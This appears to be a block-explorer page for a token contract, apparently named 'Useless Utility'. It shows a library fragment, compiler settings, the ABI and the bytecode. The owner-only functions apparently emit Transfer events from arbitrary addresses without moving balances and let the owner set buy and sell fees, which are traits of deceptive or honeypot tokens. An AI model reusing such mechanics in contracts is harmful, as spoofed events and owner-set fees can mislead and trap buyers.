     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "evmVersion": "shanghai",
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "metadata": {
    "useLiteralContent": true
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"multiSends","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"_buy","type":"uint8"},{"internalType":"uint8","name":"_sell","type":"uint8"}],"name":"setRule","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600f60809081526e5573656c657373205574696c69747960881b60a0525f906200002f9082620004b4565b50604080518082019091526002815261555560f01b6020820152600190620000589082620004b4565b506002805461050561ffff19909116179055600a80546001600160a01b0319908116731954c320621bbb78b55e2d1b8773bc9adc5b631417909155600b8054821673966dd1548dae31b41ccdaf6d53af26d5912e6d29179055600c80548216737d79a9d782f844b893380e9798ffda4dc6909343179055600d8054909116738a7cf839f6e3cd1aa90024f99cd209c7e1712b5a179055348015620000fa575f80fd5b5060098054336001600160a01b03199182168117909255600680549091169091179055305f908152600460209081526040808320737a250d5630b4cf539739df2c5dacb4c659f2488d845290915290205f19905560646200015e6012600a6200068f565b6200016e90633b9aca00620006a6565b6200017b906037620006a6565b620001879190620006c0565b600980546001600160a01b039081165f90815260036020908152604080832095909555600754935483168252848220549451948552929091169290915f80516020620015f5833981519152910160405180910390a36064620001ec6012600a6200068f565b620001fc90633b9aca00620006a6565b62000209906019620006a6565b620002159190620006c0565b600a80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f80516020620015f5833981519152916200026191815260200190565b60405180910390a36064620002796012600a6200068f565b6200028990633b9aca00620006a6565b62000296906005620006a6565b620002a29190620006c0565b600b80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f80516020620015f583398151915291620002ee91815260200190565b60405180910390a36064620003066012600a6200068f565b6200031690633b9aca00620006a6565b62000323906003620006a6565b6200032f9190620006c0565b600c80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f80516020620015f5833981519152916200037b91815260200190565b60405180910390a36064620003936012600a6200068f565b620003a390633b9aca00620006a6565b620003b0906002620006a6565b620003bc9190620006c0565b600d80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f80516020620015f5833981519152916200040891815260200190565b60405180910390a3620006e0565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200043f57607f821691505b6020821081036200045e57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620004af57805f5260205f20601f840160051c810160208510156200048b5750805b601f840160051c820191505b81811015620004ac575f815560010162000497565b50505b505050565b81516001600160401b03811115620004d057620004d062000416565b620004e881620004e184546200042a565b8462000464565b602080601f8311600181146200051e575f8415620005065750858301515b5f19600386901b1c1916600185901b17855562000578565b5f85815260208120601f198616915b828110156200054e578886015182559484019460019091019084016200052d565b50858210156200056c57878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115620005d457815f1904821115620005b857620005b862000580565b80851615620005c657918102915b93841c939080029062000599565b509250929050565b5f82620005ec5750600162000689565b81620005fa57505f62000689565b81600181146200061357600281146200061e576200063e565b600191505062000689565b60ff84111562000632576200063262000580565b50506001821b62000689565b5060208310610133831016604e8410600b841016171562000663575081810a62000689565b6200066f838362000594565b805f190482111562000685576200068562000580565b0290505b92915050565b5f6200069f60ff841683620005dc565b9392505050565b808202811582820484141762000689576200068962000580565b5f82620006db57634e487b7160e01b5f52601260045260245ffd5b500490565b610f0780620006ee5f395ff3fe6080604052600436106100c2575f3560e01c80634022b75e1161007c578063a9059cbb11610057578063a9059cbb1461020c578063b22c95e71461022b578063c9567bf91461024a578063dd62ed3e1461025e575f80fd5b80634022b75e146101ae57806370a08231146101cd57806395d89b41146101f8575f80fd5b806306fdde03146100cd578063095ea7b3146100f75780630a7ad74c1461012657806318160ddd1461014757806323b872dd14610169578063313ce56714610188575f80fd5b366100c957005b5f80fd5b3480156100d8575f80fd5b506100e1610294565b6040516100ee9190610a89565b60405180910390f35b348015610102575f80fd5b50610116610111366004610af0565b610323565b60405190151581526020016100ee565b348015610131575f80fd5b50610145610140366004610b28565b61038f565b005b348015610152575f80fd5b5061015b6103da565b6040519081526020016100ee565b348015610174575f80fd5b50610116610183366004610b59565b6103f7565b348015610193575f80fd5b5061019c601281565b60405160ff90911681526020016100ee565b3480156101b9575f80fd5b506101456101c8366004610bda565b610444565b3480156101d8575f80fd5b5061015b6101e7366004610c55565b60036020525f908152604090205481565b348015610203575f80fd5b506100e1610500565b348015610217575f80fd5b50610116610226366004610af0565b61050f565b348015610236575f80fd5b50610145610245366004610bda565b610522565b348015610255575f80fd5b506101456105d6565b348015610269575f80fd5b5061015b610278366004610c6e565b600460209081525f928352604080842090915290825290205481565b60605f80546102a290610c96565b80601f01602080910402602001604051908101604052809291908181526020018280546102ce90610c96565b80156103195780601f106102f057610100808354040283529160200191610319565b820191905f5260205f20905b8154815290600101906020018083116102fc57829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061037d9086815260200190565b60405180910390a35060015b92915050565b6006546001600160a01b031633146103b957604051629af2b160e81b815260040160405180910390fd5b6002805460ff9283166101000261ffff199091169390921692909217179055565b6103e66012600a610dc2565b6103f490633b9aca00610dd0565b81565b6001600160a01b0383165f90815260046020908152604080832033845290915281208054839190839061042b908490610de7565b9091555061043c9050848484610617565b949350505050565b6006546001600160a01b0316331461046e57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104f85784848281811061048a5761048a610dfa565b905060200201602081019061049f9190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb28339815191528585858181106104d2576104d2610dfa565b905060200201356040516104e891815260200190565b60405180910390a3600101610470565b505050505050565b6060600180546102a290610c96565b5f61051b338484610617565b9392505050565b6006546001600160a01b0316331461054c57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104f85784848281811061056857610568610dfa565b905060200201602081019061057d9190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb28339815191528585858181106105b0576105b0610dfa565b905060200201356040516105c691815260200190565b60405180910390a360010161054e565b6006546001600160a01b031633146105ec575f80fd5b600654600160a81b900460ff1615610602575f80fd5b6006805460ff60a81b1916600160a81b179055565b6006545f90600160a81b900460ff168061063e57506006546001600160a01b038581169116145b8061065657506006546001600160a01b038481169116145b61065e575f80fd5b600654600160a81b900460ff1615801561068157506005546001600160a01b0316155b801561068c57505f82115b156106ad57600580546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260036020526040812080548492906106d4908490610de7565b90915550506005546001600160a01b0384811691161480156107005750600654600160a01b900460ff16155b801561073f575060646107156012600a610dc2565b61072390633b9aca00610dd0565b61072d9190610e0e565b305f9081526003602052604090205410155b801561075957506006546001600160a01b03858116911614155b156108dc576006805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106107a4576107a4610dfa565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106107ec576107ec610dfa565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f6139606461082c6012600a610dc2565b61083a90633b9aca00610dd0565b6108449190610e0e565b5f8430426040518663ffffffff1660e01b8152600401610868959493929190610e2d565b5f604051808303815f87803b15801561087f575f80fd5b505af1158015610891573d5f803e3d5ffd5b50506006546040516001600160a01b0390911692504780156108fc029250905f818181858888f193505050501580156108cc573d5f803e3d5ffd5b50506006805460ff60a01b191690555b6001600160a01b03841630148015906109035750600654600160a81b900460ff1615156001145b15610986576005545f906064906001600160a01b0387811691161461093257600254610100900460ff16610939565b60025460ff165b6109469060ff1685610dd0565b6109509190610e0e565b905061095c8184610de7565b305f9081526003602052604081208054929550839290919061097f908490610e9e565b9091555050505b6001600160a01b0383165f90815260036020526040812080548492906109ad908490610e9e565b90915550506008546001600160a01b03908116908516036109ff576007546040518381526001600160a01b038581169216905f80516020610eb2833981519152906020015b60405180910390a3610a7f565b6008546001600160a01b0390811690841603610a44576007546040518381526001600160a01b03918216918616905f80516020610eb2833981519152906020016109f2565b826001600160a01b0316846001600160a01b03165f80516020610eb283398151915284604051610a7691815260200190565b60405180910390a35b5060019392505050565b5f602080835283518060208501525f5b81811015610ab557858101830151858201604001528201610a99565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aeb575f80fd5b919050565b5f8060408385031215610b01575f80fd5b610b0a83610ad5565b946020939093013593505050565b803560ff81168114610aeb575f80fd5b5f8060408385031215610b39575f80fd5b610b4283610b18565b9150610b5060208401610b18565b90509250929050565b5f805f60608486031215610b6b575f80fd5b610b7484610ad5565b9250610b8260208501610ad5565b9150604084013590509250925092565b5f8083601f840112610ba2575f80fd5b50813567ffffffffffffffff811115610bb9575f80fd5b6020830191508360208260051b8501011115610bd3575f80fd5b9250929050565b5f805f805f60608688031215610bee575f80fd5b610bf786610ad5565b9450602086013567ffffffffffffffff80821115610c13575f80fd5b610c1f89838a01610b92565b90965094506040880135915080821115610c37575f80fd5b50610c4488828901610b92565b969995985093965092949392505050565b5f60208284031215610c65575f80fd5b61051b82610ad5565b5f8060408385031215610c7f575f80fd5b610c8883610ad5565b9150610b5060208401610ad5565b600181811c90821680610caa57607f821691505b602082108103610cc857634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610d1c57815f1904821115610d0257610d02610cce565b80851615610d0f57918102915b93841c9390800290610ce7565b509250929050565b5f82610d3257506001610389565b81610d3e57505f610389565b8160018114610d545760028114610d5e57610d7a565b6001915050610389565b60ff841115610d6f57610d6f610cce565b50506001821b610389565b5060208310610133831016604e8410600b8410161715610d9d575081810a610389565b610da78383610ce2565b805f1904821115610dba57610dba610cce565b029392505050565b5f61051b60ff841683610d24565b808202811582820484141761038957610389610cce565b8181038181111561038957610389610cce565b634e487b7160e01b5f52603260045260245ffd5b5f82610e2857634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610e7d5784516001600160a01b031683529383019391830191600101610e58565b50506001600160a01b03969096166060850152505050608001529392505050565b8082018082111561038957610389610cce56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa26469706673582212209821708ec6676e043e529edfeecc513ea468c0ca1d282e085c920ca1184550d864736f6c63430008160033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef

Deployed Bytecode

0x6080604052600436106100c2575f3560e01c80634022b75e1161007c578063a9059cbb11610057578063a9059cbb1461020c578063b22c95e71461022b578063c9567bf91461024a578063dd62ed3e1461025e575f80fd5b80634022b75e146101ae57806370a08231146101cd57806395d89b41146101f8575f80fd5b806306fdde03146100cd578063095ea7b3146100f75780630a7ad74c1461012657806318160ddd1461014757806323b872dd14610169578063313ce56714610188575f80fd5b366100c957005b5f80fd5b3480156100d8575f80fd5b506100e1610294565b6040516100ee9190610a89565b60405180910390f35b348015610102575f80fd5b50610116610111366004610af0565b610323565b60405190151581526020016100ee565b348015610131575f80fd5b50610145610140366004610b28565b61038f565b005b348015610152575f80fd5b5061015b6103da565b6040519081526020016100ee565b348015610174575f80fd5b50610116610183366004610b59565b6103f7565b348015610193575f80fd5b5061019c601281565b60405160ff90911681526020016100ee565b3480156101b9575f80fd5b506101456101c8366004610bda565b610444565b3480156101d8575f80fd5b5061015b6101e7366004610c55565b60036020525f908152604090205481565b348015610203575f80fd5b506100e1610500565b348015610217575f80fd5b50610116610226366004610af0565b61050f565b348015610236575f80fd5b50610145610245366004610bda565b610522565b348015610255575f80fd5b506101456105d6565b348015610269575f80fd5b5061015b610278366004610c6e565b600460209081525f928352604080842090915290825290205481565b60605f80546102a290610c96565b80601f01602080910402602001604051908101604052809291908181526020018280546102ce90610c96565b80156103195780601f106102f057610100808354040283529160200191610319565b820191905f5260205f20905b8154815290600101906020018083116102fc57829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061037d9086815260200190565b60405180910390a35060015b92915050565b6006546001600160a01b031633146103b957604051629af2b160e81b815260040160405180910390fd5b6002805460ff9283166101000261ffff199091169390921692909217179055565b6103e66012600a610dc2565b6103f490633b9aca00610dd0565b81565b6001600160a01b0383165f90815260046020908152604080832033845290915281208054839190839061042b908490610de7565b9091555061043c9050848484610617565b949350505050565b6006546001600160a01b0316331461046e57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104f85784848281811061048a5761048a610dfa565b905060200201602081019061049f9190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb28339815191528585858181106104d2576104d2610dfa565b905060200201356040516104e891815260200190565b60405180910390a3600101610470565b505050505050565b6060600180546102a290610c96565b5f61051b338484610617565b9392505050565b6006546001600160a01b0316331461054c57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104f85784848281811061056857610568610dfa565b905060200201602081019061057d9190610c55565b6001600160a01b0316866001600160a01b03165f80516020610eb28339815191528585858181106105b0576105b0610dfa565b905060200201356040516105c691815260200190565b60405180910390a360010161054e565b6006546001600160a01b031633146105ec575f80fd5b600654600160a81b900460ff1615610602575f80fd5b6006805460ff60a81b1916600160a81b179055565b6006545f90600160a81b900460ff168061063e57506006546001600160a01b038581169116145b8061065657506006546001600160a01b038481169116145b61065e575f80fd5b600654600160a81b900460ff1615801561068157506005546001600160a01b0316155b801561068c57505f82115b156106ad57600580546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260036020526040812080548492906106d4908490610de7565b90915550506005546001600160a01b0384811691161480156107005750600654600160a01b900460ff16155b801561073f575060646107156012600a610dc2565b61072390633b9aca00610dd0565b61072d9190610e0e565b305f9081526003602052604090205410155b801561075957506006546001600160a01b03858116911614155b156108dc576006805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106107a4576107a4610dfa565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2816001815181106107ec576107ec610dfa565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f6139606461082c6012600a610dc2565b61083a90633b9aca00610dd0565b6108449190610e0e565b5f8430426040518663ffffffff1660e01b8152600401610868959493929190610e2d565b5f604051808303815f87803b15801561087f575f80fd5b505af1158015610891573d5f803e3d5ffd5b50506006546040516001600160a01b0390911692504780156108fc029250905f818181858888f193505050501580156108cc573d5f803e3d5ffd5b50506006805460ff60a01b191690555b6001600160a01b03841630148015906109035750600654600160a81b900460ff1615156001145b15610986576005545f906064906001600160a01b0387811691161461093257600254610100900460ff16610939565b60025460ff165b6109469060ff1685610dd0565b6109509190610e0e565b905061095c8184610de7565b305f9081526003602052604081208054929550839290919061097f908490610e9e565b9091555050505b6001600160a01b0383165f90815260036020526040812080548492906109ad908490610e9e565b90915550506008546001600160a01b03908116908516036109ff576007546040518381526001600160a01b038581169216905f80516020610eb2833981519152906020015b60405180910390a3610a7f565b6008546001600160a01b0390811690841603610a44576007546040518381526001600160a01b03918216918616905f80516020610eb2833981519152906020016109f2565b826001600160a01b0316846001600160a01b03165f80516020610eb283398151915284604051610a7691815260200190565b60405180910390a35b5060019392505050565b5f602080835283518060208501525f5b81811015610ab557858101830151858201604001528201610a99565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610aeb575f80fd5b919050565b5f8060408385031215610b01575f80fd5b610b0a83610ad5565b946020939093013593505050565b803560ff81168114610aeb575f80fd5b5f8060408385031215610b39575f80fd5b610b4283610b18565b9150610b5060208401610b18565b90509250929050565b5f805f60608486031215610b6b575f80fd5b610b7484610ad5565b9250610b8260208501610ad5565b9150604084013590509250925092565b5f8083601f840112610ba2575f80fd5b50813567ffffffffffffffff811115610bb9575f80fd5b6020830191508360208260051b8501011115610bd3575f80fd5b9250929050565b5f805f805f60608688031215610bee575f80fd5b610bf786610ad5565b9450602086013567ffffffffffffffff80821115610c13575f80fd5b610c1f89838a01610b92565b90965094506040880135915080821115610c37575f80fd5b50610c4488828901610b92565b969995985093965092949392505050565b5f60208284031215610c65575f80fd5b61051b82610ad5565b5f8060408385031215610c7f575f80fd5b610c8883610ad5565b9150610b5060208401610ad5565b600181811c90821680610caa57607f821691505b602082108103610cc857634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610d1c57815f1904821115610d0257610d02610cce565b80851615610d0f57918102915b93841c9390800290610ce7565b509250929050565b5f82610d3257506001610389565b81610d3e57505f610389565b8160018114610d545760028114610d5e57610d7a565b6001915050610389565b60ff841115610d6f57610d6f610cce565b50506001821b610389565b5060208310610133831016604e8410600b8410161715610d9d575081810a610389565b610da78383610ce2565b805f1904821115610dba57610dba610cce565b029392505050565b5f61051b60ff841683610d24565b808202811582820484141761038957610389610cce565b8181038181111561038957610389610cce565b634e487b7160e01b5f52603260045260245ffd5b5f82610e2857634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610e7d5784516001600160a01b031683529383019391830191600101610e58565b50506001600160a01b03969096166060850152505050608001529392505050565b8082018082111561038957610389610cce56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa26469706673582212209821708ec6676e043e529edfeecc513ea468c0ca1d282e085c920ca1184550d864736f6c63430008160033

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.